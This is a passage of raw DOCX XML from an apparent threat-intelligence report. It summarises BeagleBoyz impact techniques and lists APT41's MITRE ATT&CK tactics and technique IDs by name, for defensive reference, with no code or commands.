      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FASTCash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for Windows malware are available at https://us-cert.cisa.gov/northkorea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7736E630" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="1029B3F4" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeagleBoyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have used the following techniques to manipulate business and operational processes for monetary or destructive purposes (Impact [TA0040]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE95C80" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9"/>
    <w:p w14:paraId="558E7191" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Corrupt or wipe data storage, data structures, and Master Boot Records (MBR) to interrupt network availability, services, and resources (Disk Wipe: Disk Structure Wipe [T1561.002], Data Destruction [T1485])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A7A410" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encrypt data on target systems and withhold access to the decryption key until a ransom is paid, or render data permanently inaccessible if the ransom is not paid (Data Encrypted for Impact [T1486])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4DD23A" w14:textId="77777777" w:rsidR="003E5EB9" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stop, disable, or render services unavailable on a system to damage the environment or inhibit incident response (Service Stop [T1489])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BCFAE6" w14:textId="4A86E1CC" w:rsidR="003E5EB9" w:rsidRPr="00AE350A" w:rsidRDefault="003E5EB9" w:rsidP="003E5EB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Insert, delete, or modify data at rest, in transit, or in use to manipulate outcomes, hide activity, and affect the business process, organizational understanding, and decision-making (Data Manipulation: Stored Data Manipulation [T1565.001], Data Manipulation: Transmitted Data Manipulation [T1565.002], Data Manipulation: Runtime Data Manipulation [T1565.003])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E167ED" w14:textId="77777777" w:rsidR="00303E82" w:rsidRDefault="00303E82"/>
    <w:p w14:paraId="13139427" w14:textId="77777777" w:rsidR="00303E82" w:rsidRDefault="00303E82"/>
    <w:p w14:paraId="7FD8D24F" w14:textId="77777777" w:rsidR="000003D7" w:rsidRDefault="000003D7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C091AAF" w14:textId="65A13102" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="000003D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc153480872"/>
      <w:r w:rsidRPr="009A05C9">
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>PT 41</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="44517A53" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="005B4630" w:rsidRDefault="000003D7" w:rsidP="000003D7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc153480873"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="0C9E1A93" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="00CC70C1" w:rsidRDefault="00CC70C1" w:rsidP="00CC70C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0096 - APT41 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286E38B8" w14:textId="42FAA70A" w:rsidR="00CC70C1" w:rsidRPr="00CC70C1" w:rsidRDefault="00CC70C1" w:rsidP="00CC70C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group ATT&amp;CK attribution is </w:t>
      </w:r>
      <w:r w:rsidR="0029354D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>China</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2782B0FA" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="00CC70C1" w:rsidRDefault="00CC70C1" w:rsidP="00CC70C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is CN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC4142"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F06408"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1588.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323A65B1"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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C0887"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1190', 'T1078', 'T1195.002', 'T1133', 'T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BFD2A0"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1190 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780004B6" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="004F11AC" w:rsidRDefault="00CC70C1" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="004F11AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004F11AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F11AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C1A9FC"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4F11AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1195.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F11AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Supply Chain Compromise&gt;:Compromise Software Supply Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A309BB"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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B914F7"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T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B660CE4"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1569.002', 'T1059.004', 'T1203', 'T1053.005', 'T1059.003', 'T1047', 'T1059.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55095367"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T1569.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Services&gt;:Service Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D188AF"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T1059.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Unix Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E757B7D"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1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0F430D"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308C1EFE" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="00C1675A" w:rsidRDefault="00CC70C1" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C1675A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C1675A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8DC4E0"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC68D9A"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T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33510C"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1574.001', 'T1574.006', 'T1197', 'T1574.002', 'T1136.001', 'T1053.005', 'T1543.003', 'T1547.001', 'T1078', 'T1133', 'T1546.008', 'T1542.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB8F5D4"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T1574.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Search Order Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BB8FE5"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T1574.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:Dynamic Linker Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8C21C8"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1197 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> BITS Jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8A41E"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BCB7B0"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T1136.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create Account&gt;:Local Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFBBE6"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D381BAD"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8AB3BB" w14:textId="77777777" w:rsidR="00CC70C1" w:rsidRPr="002B5C71" w:rsidRDefault="00CC70C1" w:rsidP="00860DC2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B5C71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B5C71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002B5C71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002B5C71">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201DFEC0"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C2E24B"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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04702939"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T1546.008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Accessibility Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEA183E"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T1542.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Pre-OS Boot&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bootkit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78B0E6A0"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1574.001', 'T1574.006', 'T1574.002', 'T1055', 'T1053.005', 'T1543.003', 'T1547.001', 'T1078', 'T1546.008']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358C7BBE"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T1574.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Search Order Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6973E5FD"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T1574.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:Dynamic Linker Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4AFD12"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB4D11"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1055 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2128617D"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC70C1">
        <w:rPr>
